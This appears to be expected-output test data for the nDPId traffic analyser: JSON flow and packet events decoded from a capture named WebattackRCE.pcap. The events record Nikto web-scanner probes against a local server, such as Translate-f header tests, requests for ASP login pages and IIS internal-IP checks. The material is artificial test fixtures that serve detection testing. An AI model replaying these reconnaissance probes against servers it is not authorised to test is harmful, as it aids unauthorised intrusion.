-00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 